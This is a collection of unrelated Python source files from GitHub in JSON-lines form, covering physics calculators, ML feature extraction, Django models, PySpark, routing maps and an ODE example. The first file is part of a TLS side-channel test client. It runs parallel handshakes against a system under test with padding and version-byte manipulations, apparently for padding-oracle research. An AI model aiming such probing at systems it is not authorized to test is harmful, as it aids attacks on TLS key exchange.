['./tls_test_tool_client/TlsTestTool']\n print(f'Starting client {request_index} with test case {current_case}{\", skipping CCS&FIN\" if skip_ccs_fin else \"\"}')\n call_array.extend([f'--configFile={config_file}' for config_file in config_files])\n\n # Start the tls test tool using popen, save log output to string\n try:\n pipes = subprocess.Popen(call_array, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n std_out, std_err = pipes.communicate()\n std_out = std_out.decode('utf-8')\n std_err = std_err.decode('utf-8')\n if pipes.returncode != 0:\n print(std_out)\n print(f'Return code: {pipes.returncode}')\n if len(std_err):\n print(f'Stderr: {std_err}')\n except OSError as error:\n print(f'OSError {error}')\n std_out = b''\n\n client_hello_random = determine_client_hello_random(std_out)\n time.sleep(wait_time * 0.001)\n return client_hello_random, current_case, skip_ccs_fin\n\n\ndef run_multiple_clients(repetitions: int, sut_name: str, use_sentinel: bool, wait_time: float, skip: bool, noskip: bool, parallelization_factor: int, twoclass: bool, oneclass: bool):\n request_arguments = [[index, sut_name, use_sentinel, wait_time, skip, noskip, twoclass, oneclass] for index in range(repetitions)]\n with multiprocessing.Pool(processes=parallelization_factor) as pool:\n results = pool.starmap(run_single_session, request_arguments)\n results_dataframe = pandas.DataFrame(results, columns=['client_hello_random', 'label', 'skipped_ccs_fin'])\n return results_dataframe\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '--folder', required=True,\n help='Folder that contains the input files Packets.pcap and Client Requests.csv '\n 'and that the output files will be written to')\nparser.add_argument('-r', '--repetitions', type=int, required=True,\n help='Number of handshakes to execute')\nparser.add_argument('-s', '--sentinel', action='store_true',\n help='Use the sentinel-protected, unrestricted version of the TLS test tool')\nparser.add_argument('-n', '--name', required=True,\n help='Name of the system under test, used to load the matching IP&port configuration')\nparser.add_argument('-w', '--wait', type=int, default=0,\n help='Wait time in milliseconds after each request before starting the next request')\nparser.add_argument('--skip', action='store_true', default=False,\n help='Make some request where the client omits ChangeCipherSpec and Finished')\nparser.add_argument('--noskip', action='store_true', default=False,\n help='Make some request where the client properly sends ChangeCipherSpec and Finished')\nparser.add_argument('--processes', type=int, default=1,\n help='Parallelization factor, how many processes to use concurrently')\nparser.add_argument('--twoclass', action='store_true', default=False,\n help='Only choose between correct padding and wrong version number manipulations')\nparser.add_argument('--oneclass', action='store_true', default=False,\n help='Instead of randomly choosing between all manipulations, choose only wrong first byte')\nargs = parser.parse_args()\nrequest_results = run_multiple_clients(args.repetitions, args.name, args.sentinel, args.wait, args.skip, args.noskip, args.processes, args.twoclass, args.oneclass)\nrequest_results.to_csv(f'{args.folder}/Client Requests.csv')\nrequest_results.to_excel(f'{args.folder}/Client Requests.xlsx')\n","repo_name":"ITSC-Group/autosca-tool","sub_path":"tls_test_tool_client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"36033422804","text":"import math\nfrom typing import Any, Union\n\ndef calconde():\n while True:\n # variable pour vérifier la saisie du nombre de saisie voulues\n l = input(\"Quelle est la longueur d'onde à convertir en EléctronVolt ? \")\n try:\n l = int(l)\n if l < 0:\n print(\"Erreur, valeur inférieure à zéro.\", end=\" \")\n continue\n else:\n break\n except ValueError:\n print(\"Valeur saisie non valide. Recommencez\")\n continue\n c = 3 * 10 ** 8\n a = l * 10 ** -9\n v = c / l\n h = 6.63 * 10 ** -34\n j = v * h\n ev = 1.6 * 10 ** -19\n t = j/ev\n r =round(t*10**9, 2)\n print(\"Le résultat est:\",r,\"eV\")\n\ncalconde()\n\ninput(\"Appuyez sur ENTREE pour continuer\")","repo_name":"NewRedsquare/Python-ICN","sub_path":"calcul_onde.py","file_name":"calcul_onde.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"418385011","text":"import keras\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.callbacks import ModelCheckpoint\nfrom keras import backend as K\nimport pickle\n\nimport lutorpy as lua\n\nrequire(\"torch\")\n\nbatch_size = 16\nnum_classes = 20\nepochs = 1000\n\ntotal_features = []\n\n# input image dimensions\nimg_rows, img_cols = 128, 256\n\ntrain_data = []\ntrain_labels = []\n\nfile_names = []\nclass_ids = []\n\nfilelist = open('filelist.txt', 'r')\n\nfor file in filelist.readlines():\n fname, classid = file.split(' ')\n file_names.append(fname)\n classid = int(classid) - 1 # Make them zero indexed\n class_ids.append(classid+1)\n imgfile = Image.open(fname)\n img = imgfile.resize((img_rows, img_cols), Image.ANTIALIAS) \n img = np.asarray(img)\n train_data.append(img)\n train_labels.append(classid)\n \ntrain_data = np.array(train_data)\ntrain_labels = np.array(train_labels)\n\n#print train_data.shape, train_labels.shape\n\nif K.image_data_format() == 'channels_first':\n train_data = train_data.reshape(train_data.shape[0], 3, img_rows, img_cols)\n input_shape = (3, img_rows, img_cols)\nelse:\n train_data = train_data.reshape(train_data.shape[0], img_rows, img_cols, 3)\n input_shape = (img_rows, img_cols, 3)\n\ntrain_data = train_data.astype('float32')\ntrain_data /= 255\nprint('train_data shape:', train_data.shape)\nprint(train_data.shape[0], 'train samples')\n\n# convert class vectors to binary class matrices\ntrain_labels = keras.utils.to_categorical(train_labels, num_classes)\n\nmodel = Sequential()\nmodel.add(Conv2D(64, kernel_size=(5, 5),\n activation='relu',\n input_shape=input_shape))\nmodel.add(Conv2D(128, (5, 5), activation='relu', padding='same'))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(128, (5, 5), activation='relu', padding='same'))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(128, (5, 5), activation='relu', padding='same'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(128, (5, 5), activation='relu', padding='same'))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(128, (5, 5), activation='relu', padding='same'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(256, (3, 3), activation='relu', padding='same'))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(256, (3, 3), activation='relu', padding='same'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(256, (3, 3), activation='relu', padding='same'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(512, (3, 3), activation='relu', padding='same'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.3))\nmodel.add(Flatten())\ndense_lyr_out = Dense(1024, activation='relu')\nmodel.add(dense_lyr_out)\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nmodel.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adadelta(),\n metrics=['accuracy'])\n\nmodel.load_weights('cnn_weights.hdf5')\n\ndense_lyr_out_f = K.function([model.layers[0].input, K.learning_phase()], [dense_lyr_out.output,])\n\nfor data_point in range(len(train_data)):\n cur_out = dense_lyr_out_f([[train_data[data_point],], 0])[0]\n total_features.append(cur_out.tolist())\n cur_out = np.expand_dims(np.asarray(cur_out), axis=2)\n out_name = file_names[data_point] + 'features.t7'\n tensor_t = torch.fromNumpyArray(cur_out)\n #torch.save(out_name, tensor_t)\n\npickle.dump(total_features, open(\"char-CNN-RNN-embeddings.pickle\", \"wb\"))\npickle.dump(class_ids, open(\"class_info.pickle\", \"wb\"))\npickle.dump(file_names, open(\"filenames.pickle\", \"wb\"))","repo_name":"erilyth/DeepLearning-Challenges","sub_path":"Image_Synthesis_From_Text/char-CNN-RNN/pascal1k/featurescnn.py","file_name":"featurescnn.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"48"} +{"seq_id":"28507391829","text":"sum_s = 1000\r\nsum_e = 1100\r\nper = 0\r\n\r\nmont = 0\r\nwhile sum_s < sum_e:\r\n per = float(input('введите желаемые проценты(от 0 до 25):'))\r\n if 0 < per < 25:\r\n sum_s += sum_s/100*per\r\n mont += 1\r\n else:\r\n print('вы ввели неверное количество процентов, попробуйте еще раз')\r\n\r\nprint('через {} месяцев, сумма составит {}'.format(mont, sum_s))","repo_name":"dekamiron/my_first_attempt","sub_path":"homeWork02/task04.py","file_name":"task04.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37758966259","text":"from ast import List\n\n\n#Given an integer array nums, return true if any value appears at least twice in the array, and return false if every element is distinct.\n\n# Example 1:\n# Input: nums = [1,2,3,1]\n# Output: true\n\n# Example 2:\n# Input: nums = [1,2,3,4]\n# Output: false\n\n# Example 3:\n# Input: nums = [1,1,1,3,3,4,3,2,4,2]\n# Output: true\n\n\n\"\"\"\n1\nBrute Force Approach \nt: O(N ^ 2) s: O(1)\n\"\"\"\ndef find_duplicates_bruteforce(nums):\n for i in range(len(nums)):\n for j in range(i+1, len(nums)):\n if nums[i] == nums[j]:\n return True \n \n return False \n\n\"\"\"\n2\nSorting \nt: O(NlogN) s: O(1)\n\"\"\"\ndef duplicate_sorting(nums):\n nums.sort()\n \n for i in range(1, len(nums)):\n if nums[i] == nums[i-1]:\n return True \n \n return False \n\"\"\"\n3\n# Hashmap / Hashset \nt: O(N) and s: O(N)\n\"\"\"\ndef duplicate_4(nums):\n\n seen = set()\n for num in nums:\n if num in seen:\n return True\n seen.add(num)\n \n return False \n\n\"\"\"\n4\nSet and Original Comparison\nt: O(N) and s: O(N)\n\"\"\"\n\ndef duplicate_5(nums):\n nums_set = set(nums)\n return len(nums) == len(nums_set)\n\n\"\"\"\n5\nUsing collections.counter()\nt: O(N) s:(N)\n\"\"\"\nimport collections \ndef duplicate_6(nums):\n count_dict = collections.Counter(nums).items()\n print([item for item, count in count_dict if count > 1])\n\n\n\n\n\nif __name__ == \"__main__\":\n nums = [4,6,1,8,10,4]\n k = 3\n print(duplicate_4(nums))\n\n","repo_name":"ermantatar/Algorithms","sub_path":"Python/0_______ARRAY_______/Contains_Duplicate.py","file_name":"Contains_Duplicate.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25599308156","text":"from django.db import models\nfrom users.models import User\nfrom company.models import Company\n\n #for filtering job search\nclass City(models.Model):\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return self.name\n \nclass Industry(models.Model):\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return self.name\n \n# Create your models here.\nclass Job(models.Model):\n job_type_choices = (\n ('Full Time', 'Full Time'),\n ('Part Time', 'Part Time'),\n ('Internship', 'Internship'),\n ('Remote', 'Remote'),\n \n )\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n company = models.ForeignKey(Company, on_delete=models.CASCADE)\n title = models.CharField(max_length=100)\n # email = models.EmailField(unique=True)\n # location = models.CharField(max_length=100)\n salary = models.IntegerField(default=35000)\n requirements = models.TextField()\n ideal_candidate = models.TextField()\n is_available = models.BooleanField(default=True)\n timestamp = models.DateTimeField(auto_now_add=True)\n industry = models.ForeignKey(Industry, on_delete=models.DO_NOTHING, null=True, blank=True)\n city = models.ForeignKey(City, on_delete=models.DO_NOTHING, null=True, blank=True)\n job_type = models.CharField(max_length=100, choices=job_type_choices, null=True, blank=True)\n\n def __str__(self):\n return self.title\n \nclass ApplyJob(models.Model):\n JOB_STATUS_CHOICES = (\n ('Pending', 'Pending'),\n ('Approved', 'Approved'),\n ('Rejected', 'Rejected'),\n )\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n job = models.ForeignKey(Job, on_delete=models.CASCADE)\n content = models.CharField(max_length=20000, null=True, blank=True, )\n experience = models.PositiveBigIntegerField(null=True, blank=True)\n\n timestamp = models.DateTimeField(auto_now_add=True)\n job_status = models.CharField(max_length=20, choices=JOB_STATUS_CHOICES, default='Pending')\n\n\n\nclass ConversationMessage(models.Model):\n applyjob = models.ForeignKey(ApplyJob, related_name='conversationmessages', on_delete=models.CASCADE)\n content = models.TextField(null=True, blank=True)\n user = models.ForeignKey(User, related_name='conversationmessages', on_delete=models.CASCADE)\n timestamp = models.DateTimeField(auto_now_add=True)\n\n\n class Meta:\n ordering = ['timestamp']\n","repo_name":"Noahwekesa/Job-django","sub_path":"src/job/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28261762550","text":"from pyspark.sql.functions import *\nfrom pyspark.sql.functions import col\n\nfrom utils import spark, users_df\n\ndf = users_df.select(\n col('id'),\n users_df['customer_from'],\n date_format(col('customer_from'), 'yyyyMMdd').alias('int_date'),\n)\ndf.show()\n\ncols = [\n col('id'),\n users_df['customer_from'],\n date_format(col('customer_from'), 'yyyyMMdd').cast('int').alias('int_date')\n]\n\ndf.select(cols).show()\n\ndf.select(cols).printSchema()\n\ndf.select(*cols).show()\n\ndf.select(*cols).printSchema()\n\ncustomer_from_alias = date_format(col('customer_from'), 'yyyyMMdd').cast('int').alias('int_date')\n\ndf.select('id', customer_from_alias).show()","repo_name":"gsk-21/SPARK","sub_path":"Databricks/Databricks Certified Associate Developer/Udemy/selecting and renaming cols/3.col_functions.py","file_name":"3.col_functions.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11796272489","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport networkx as nx\nimport osmnx as ox\nimport geopandas as gpd\nimport networkx as nx\nfrom cartopy.geodesic import Geodesic\nfrom shapely.geometry.polygon import Point, Polygon\nfrom shapely.geometry import shape\nfrom shapely.ops import unary_union\nimport nhstravel.loaders.lsoaloader as lsoaloader\nimport folium\nimport streamlit as st\n\n\n# use the postcode lookup csv to get the lsoa regions for each target location to pass to the lsoa loaders function\ndef get_lsoas_from_postcode(list_of_target_addresses):\n postcode_lookup = pd.read_csv(\n \"data/PCD_OA21_LSOA21_MSOA21_LAD_NOV22_UK_LU 3.csv\", encoding=\"ISO-8859-1\"\n )\n # get the lsoa 2021 code from the lookup file\n lsoa_names = []\n # lsoa_codes = []\n for postcode in list_of_target_addresses:\n # lsoa_codes.append(postcode_lookup.loc[postcode_lookup['pcds'] == postcode]['lsoa21cd'].values[0])\n lsoa_names.append(\n postcode_lookup.loc[postcode_lookup[\"pcds\"] == postcode][\"ladnm\"].values[0]\n )\n return lsoa_names\n\n\n# function to call lsoa loaders library to import lsoa data for the given regin\ndef load_lsoa(region):\n print(\"building lsoa for \", region)\n remapped_lsoas_dict = {}\n lsoa_with_population_pd = lsoaloader.build_lsoa_data_frame_for_area_england(region)\n remapped_lsoa = lsoaloader.load_geo_json_shapefiles_for_lsoas(\n lsoa_with_population_pd, region\n )\n remapped_lsoas_dict[region] = remapped_lsoa\n return remapped_lsoa, remapped_lsoas_dict\n\n\n# for each lsoa region use the lsoa loaders function to load in the data from that region\n# create a dictionary of polygons containing all neighbouring polygons within the user specified radius\ndef generate_neighboring_polys(list_of_target_addresses, lsoa_names, radius):\n neighboring_polys_dict = {}\n for address, lsoa_region in zip(list_of_target_addresses, lsoa_names):\n # load in lsoa data using the loaders function in nhs travel\n remapped_lsoa, remapped_lsoas_dict = load_lsoa(lsoa_region)\n\n # convert the postcode to lat long coordinates\n target_coords = ox.geocode(address)\n\n # create the bounding poly from target location of size = radius specified\n gd = Geodesic()\n bounding_poly = Polygon(\n gd.circle(lon=target_coords[1], lat=target_coords[0], radius=radius)\n )\n\n # convert coordinates to a point object to check if this point is contained within the bounding poly\n target_point = Point(target_coords[1], target_coords[0])\n\n # store the features from remapped_lsoa (lsoa_loaders module)\n neighboring_polys = {\"lsoa_codes\": [], \"population\": [], \"polygons\": []}\n for lsoa in remapped_lsoa[\"features\"]:\n lsoa_polygon = shape(lsoa[\"geometry\"])\n if lsoa_polygon.contains(target_point) or bounding_poly.intersects(\n lsoa_polygon\n ):\n neighboring_polys[\"lsoa_codes\"].append(lsoa[\"properties\"][\"LSOA21CD\"])\n neighboring_polys[\"population\"].append(lsoa[\"properties\"][\"all ages\"])\n neighboring_polys[\"polygons\"].append(lsoa_polygon)\n\n neighboring_polys_dict[address] = neighboring_polys\n return neighboring_polys_dict, remapped_lsoas_dict\n\n\n# create networkx map from the neighbouring polygons we create using the function above\n# without allow_output_mutation, st.cache is performing a hash of the entire graph on every run. This is taking a long time. Skip check\n@st.cache(persist=True, allow_output_mutation=True)\ndef generate_networkx(list_of_target_addresses, neighboring_polys_dict, type):\n # intiialise main dict to contain each networkx map and nodes\n networkx_dict = {}\n\n for address in list_of_target_addresses:\n # initialies data types for each address in the dictionary\n networkx_dict[address] = {}\n\n # create merged polygon to generate map from this area\n merged_poly = unary_union(neighboring_polys_dict[address][\"polygons\"])\n\n # generate networkx map and nodes and store in dictionary under the sub key for address\n G = ox.graph_from_polygon(merged_poly)\n networkx_dict[address][\"map\"] = G\n nodes, edges = ox.graph_to_gdfs(G)\n networkx_dict[address][\"nodes\"] = nodes\n\n return networkx_dict\n\n\n# funtion to generate the sample of nodes from each collection of lsoas for each target location\ndef generate_nodes_samples(\n list_of_target_adddresses, neighboring_poly_dict, networkx_dict\n):\n dict_of_nodes_samples = {}\n for address in list_of_target_addresses:\n nodes = networkx_dict[address][\"nodes\"]\n nodes_sample = pd.DataFrame(columns=nodes.columns)\n neighboring_polys = neighboring_polys_dict[address]\n\n target_coords = ox.geocode(address)\n target_node = ox.get_nearest_node(networkx_dict[address][\"map\"], target_coords)\n\n list_of_lsoa_codes = []\n list_of_pops = []\n\n for i in range(len(neighboring_polys[\"polygons\"])):\n lsoa = neighboring_polys[\"polygons\"][i]\n for j in range(nodes.shape[0]):\n if lsoa.contains(nodes.iloc[j][\"geometry\"]):\n nodes_sample = nodes_sample.append(nodes.iloc[j])\n list_of_lsoa_codes.append(neighboring_polys[\"lsoa_codes\"][i])\n list_of_pops.append(neighboring_polys[\"population\"][i])\n\n nodes_sample[\"lsoa_codes\"] = list_of_lsoa_codes\n nodes_sample[\"lsoa_population\"] = list_of_pops\n\n nodes_sample = nodes_sample.drop(target_node)\n\n dict_of_nodes_samples[address] = nodes_sample\n return dict_of_nodes_samples\n\n\n# creating a function to calculate a score from a list of lengths calculated from the target node to each of the 100 sample nodes\ndef create_score(list_of_lengths, list_of_pop_fracs, list_of_node_pops):\n average_walk = 0\n for l, m in zip(list_of_lengths, list_of_pop_fracs):\n distance_km = l / 1000\n time_hours = distance_km / 4.5\n time_minutes = time_hours * 60\n time_increment = (\n time_minutes * m\n ) # get the length in km divide by speed 4.5 km/h then divide by 60 to get time in minutes\n average_walk = (\n average_walk + time_increment\n ) # decrement the score by the derivation of time taken to each of the 100 nodes\n\n total_pop = sum(list_of_node_pops)\n return average_walk, total_pop\n\n\n# define a function to calculate multiple shortest route lengths from the target node to each of the 100 sample nodes\ndef create_list_of_lengths(G, nodes_sample, target_node):\n list_of_lengths = []\n list_of_pop_fracs = []\n list_of_node_pops = []\n\n for node in nodes_sample.index:\n current_lsoa = nodes_sample[\"lsoa_codes\"][node]\n nodes_in_lsoa = nodes_sample.loc[\n nodes_sample[\"lsoa_codes\"] == current_lsoa\n ].shape[0]\n total_pop = nodes_sample[\"lsoa_population\"].unique().sum()\n node_pop = nodes_sample[\"lsoa_population\"][node] / nodes_in_lsoa\n list_of_node_pops.append(node_pop)\n pop_fraction = node_pop / total_pop\n\n try:\n length = nx.shortest_path_length(\n G, source=node, target=target_node, weight=\"length\"\n ) # calculate route from target node to sample node\n except Exception as e:\n pass\n list_of_lengths.append(length) # append the length to the list\n list_of_pop_fracs.append(\n pop_fraction\n ) # append the multipliers to the list for score creation\n\n return [list_of_lengths, list_of_pop_fracs, list_of_node_pops]\n\n\n# function to generate the score for each of the potential target sites provided using create_score()\ndef generate_target_routes_and_scores(\n networkx_dict, dict_of_nodes_samples, list_of_target_addresses, radius\n):\n target_scores = {}\n site_names = []\n target_to_node_routes = {}\n i = 1\n\n for address in list_of_target_addresses:\n # initialise all variables\n list_of_routes = []\n # retrieve node sample using address lookup\n nodes_sample = dict_of_nodes_samples[address]\n # create site name for each postcode\n site_name = \"Site {}\".format(i)\n # retrieve networkx map from dict using address lookup\n G = networkx_dict[address][\"map\"]\n\n # convert post code to lat long and use this to find the nearest node on the network x\n target_coords = ox.geocode(address)\n target_node = ox.get_nearest_node(G, target_coords)\n\n # call our create_list_of_lengths and create_score functions defined above to generate the scores for each target site\n target_lengths = create_list_of_lengths(G, nodes_sample, target_node)\n target_scores[site_name] = create_score(\n target_lengths[0], target_lengths[1], target_lengths[2]\n )\n print(\n \"{} at {} has an average walk time of: %.2f minutes in a radius of {} metres\".format(\n site_name, address, radius\n )\n % target_scores[site_name][0]\n )\n print(\n \"{} at {} has an average population score of: %.2f in a radius of {} metres\".format(\n site_name, address, radius\n )\n % target_scores[site_name][1]\n )\n\n for node in nodes_sample.index:\n try:\n route = nx.shortest_path(\n G, source=node, target=target_node, weight=\"length\"\n ) # calculate route from target node to sample node\n list_of_routes.append(route) # append the length to the list\n except Exception:\n pass\n target_to_node_routes[site_name] = list_of_routes\n\n site_names.append(site_name)\n i += 1\n return target_to_node_routes, target_scores, site_names\n\n\ndef generate_route_layers(\n networkx_dict,\n target_to_node_routes,\n site_names,\n list_of_target_addresses,\n target_scores,\n colors=[\"green\", \"red\", \"yellow\", \"blue\", \"pink\", \"purple\"],\n):\n \"\"\"Function to plot routes from target nodes to sample nodes for on a folium map\n\n Args:\n G: Networkx graph of area\n target_to_node_routes: Dict of site names to list of routes from that node to target\n site_names: list of sites\n list_of_target_addresses: list of target addresses (same length & order as site names)\n list_of_target_coords: list of target coords (same length & order as site names)\n target_scores: score for each target\n colors: (optional) colors for routes for each site\n\n Returns:\n Single folium map with all routes and markers with one layer per site\n \"\"\"\n result = []\n for i, (site, target_address) in enumerate(\n zip(site_names, list_of_target_addresses)\n ):\n G = networkx_dict[target_address][\"map\"]\n target_coords = ox.geocode(target_address)\n layer = routes_to_featuregroup(\n G, routes=target_to_node_routes[site], color=colors[i], name=site\n )\n iframe = folium.IFrame(\n '<font face = \"Arial\"><b>{}:</b> {}. <br><br><b>{} Score:</b> {}</br></br></font>'.format(\n site, target_address, site, target_scores[site]\n )\n )\n popup = folium.Popup(iframe, min_width=200, max_width=300)\n folium.Marker(\n location=target_coords,\n popup=popup,\n icon=folium.Icon(color=colors[i], icon=\"info-sign\"),\n ).add_to(layer)\n result.append(layer)\n return result\n\n\ndef routes_to_featuregroup(G, routes, color, name):\n \"\"\"\n Convert a networkx route into a folium FeatureGroup\n\n Args:\n G: Networkx graph of area\n routes: list of routes, each of which is a list of node indices\n color: color for lines in folium\n name: name for resulting feature group\n\n Returns:\n a feature group with all routes as lines\n \"\"\"\n layer = folium.FeatureGroup(name=name)\n lines = []\n for route in routes:\n route_coords = []\n for node in route:\n route_coords.append((G.nodes[node][\"y\"], G.nodes[node][\"x\"]))\n lines.append(route_coords)\n folium.PolyLine(lines, color=color, weight=2, opacity=0.5).add_to(layer)\n\n return layer\n\n\ndef generate_lsoa_layer(remapped_lsoa, color=\"blue\"):\n layer = folium.FeatureGroup(name=\"LSOAs\")\n style = {\"color\": color}\n\n shape = folium.GeoJson(data=remapped_lsoa, style_function=lambda x: style)\n shape.add_to(layer)\n return layer\n\n\n# function to plot each of the routes from the target node to the sample nodes as a folium map and add a marker for the target node\n# save each of the folium maps as a folium object in the list route_maps to be displayed by streamlit\ndef generate_route_maps(\n networkx_dict,\n target_to_node_routes,\n site_names,\n list_of_target_addresses,\n target_scores,\n):\n route_maps = []\n for site, address in zip(site_names, list_of_target_addresses):\n G = networkx_dict[address][\"map\"]\n\n target_coords = ox.geocode(address)\n target_node = ox.get_nearest_node(G, target_coords)\n\n route_map = ox.plot_route_folium(\n G, target_to_node_routes[site][0], route_color=\"#ff0000\", opacity=0.5\n )\n for route in target_to_node_routes[site][1 : len(target_to_node_routes[site])]:\n route_map = ox.plot_route_folium(\n G, route, route_map=route_map, route_color=\"#ff0000\", opacity=0.5\n )\n\n iframe = folium.IFrame(\n '<font face = \"Arial\"><b>{}:</b> {}. <br><br><b>{} Score:</b> {}</br></br></font>'.format(\n site, address, site, target_scores[site]\n )\n )\n popup = folium.Popup(iframe, min_width=200, max_width=300)\n folium.Marker(location=target_coords, popup=popup).add_to(route_map)\n route_maps.append(route_map)\n return route_maps\n\n\n# save each of the folium maps as a folium object in the list route_maps to be displayed by streamlit\ndef save_maps(site_names, route_maps):\n for site_name, map in zip(site_names, route_maps):\n map.save(\"route map for {}.html\".format(site_name))\n\n\n# main function to generate networkx map then generate the scores and folium map for each proposed target location\ndef mclp_main(list_of_target_addresses, radius):\n lsoa_names = get_lsoas_from_postcode(list_of_target_addresses)\n neighboring_polys_dict, remapped_lsoas_dict = generate_neighboring_polys(\n list_of_target_addresses, lsoa_names, radius\n )\n networkx_dict = generate_networkx(\n list_of_target_addresses, neighboring_polys_dict, type\n )\n dict_of_nodes_samples = generate_nodes_samples(\n list_of_target_addresses, neighboring_polys_dict, networkx_dict\n )\n (\n target_to_node_routes,\n target_scores,\n site_names,\n ) = generate_target_routes_and_scores(\n networkx_dict, dict_of_nodes_samples, list_of_target_addresses, radius\n )\n\n first_target = ox.geocode(list_of_target_addresses[0])\n\n map = folium.Map(location=first_target, tiles=\"cartodbpositron\", zoom_start=13)\n\n generate_lsoa_layer(remapped_lsoas_dict[lsoa_names[0]], color=\"blue\").add_to(map)\n\n layers = generate_route_layers(\n networkx_dict,\n target_to_node_routes,\n site_names,\n list_of_target_addresses,\n target_scores,\n )\n for layer in layers:\n layer.add_to(map)\n\n # TO DO: keep in front doesnt work to move lsoa's behind route layers on folium map\n\n # add a layer control to toggle the layers on and off\n folium.LayerControl().add_to(map)\n # save_maps(site_names, route_map)\n return target_scores, map\n\n\n# call main function mclp_main(['postcode1', 'postcode2'], radius=500) to generate target_scores and route maps\n","repo_name":"DiiS-DataScience/MedMap2","sub_path":"streamlit/scripts/mclp_functions.py","file_name":"mclp_functions.py","file_ext":"py","file_size_in_byte":15922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6996925194","text":"\"\"\"\nUtils and wrappers for scoring taggers.\n\"\"\"\nfrom stanfordnlp.models.common.utils import ud_scores\n\ndef score(system_conllu_file, gold_conllu_file, verbose=True):\n \"\"\" Wrapper for tagger scorer. \"\"\"\n evaluation = ud_scores(gold_conllu_file, system_conllu_file)\n el = evaluation['AllTags']\n p = el.precision\n r = el.recall\n f = el.f1\n if verbose:\n scores = [evaluation[k].f1 * 100 for k in ['UPOS', 'XPOS', 'UFeats', 'AllTags']]\n print(\"UPOS\\tXPOS\\tUFeats\\tAllTags\")\n print(\"{:.2f}\\t{:.2f}\\t{:.2f}\\t{:.2f}\".format(*scores))\n return p, r, f\n\n","repo_name":"stanfordnlp/stanfordnlp","sub_path":"stanfordnlp/models/pos/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"48"} +{"seq_id":"17414778645","text":"from hwt.doc_markers import internal\nfrom hwt.hdl.constants import INTF_DIRECTION\nfrom hwt.synthesizer.unit import Unit\nfrom hwtSimApi.hdlSimulator import HdlSimulator\n\n\n@internal\ndef autoAddAgents(unit: Unit, sim: HdlSimulator):\n \"\"\"\n Walk all interfaces on unit and instantiate agent for every interface.\n\n :return: all monitor/driver functions which should be added to simulation\n as processes\n \"\"\"\n for intf in unit._interfaces:\n assert intf._isExtern, intf\n\n intf._initSimAgent(sim)\n assert intf._ag is not None, intf\n\n\n@internal\ndef collect_processes_from_sim_agents(unit: Unit):\n proc = []\n for intf in unit._interfaces:\n a = intf._ag\n if not intf._isExtern or a is None:\n continue\n\n if intf._direction == INTF_DIRECTION.MASTER:\n agProcs = a.getMonitors()\n elif intf._direction == INTF_DIRECTION.SLAVE:\n agProcs = a.getDrivers()\n else:\n raise NotImplementedError(f\"intf._direction {intf._direction} for {intf}\")\n\n proc.extend(agProcs)\n\n return proc\n\n","repo_name":"Nic30/hwt","sub_path":"hwt/simulator/agentConnector.py","file_name":"agentConnector.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"48"} +{"seq_id":"40371270927","text":"\"\"\"td5_mwe_odeint.py\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\n\n#############################\n# PARAMÈTRES DE LA RÉSOLUTION\n#############################\nt0 = 0 # bornes de l'intervalle de résolution\ntf = 5 # en secondes\ndt = 1e-3 # pas de temps en secondes\nn = int((tf-t0)/dt + 1) # nombre de points\nt = np.linspace(t0,tf,n) # temps en secondes\nX0 = [1,0] # conditions initiales : [u(0), du(0)/dt]\nomega0 = 2 * np.pi * 1 # pulsation propre en s^-1\n\n###############################################\n# FONCTION ASSOCIÉE À L'ÉQUATION DIFFÉRENTIELLE\n###############################################\ndef F(V, t):\n x, y = V # vecteur V : v[0] = u, v[1] = du/dt\n dx = y # dx/dt\n dy = -omega0 ** 2 * x # dy/dt\n dV = [dx, dy] # vecteur dV/dt : dV[0] = du/dt, dV[1] = d2u/dt2 \n return dV\n\n########################################\n# RÉSOLUTION 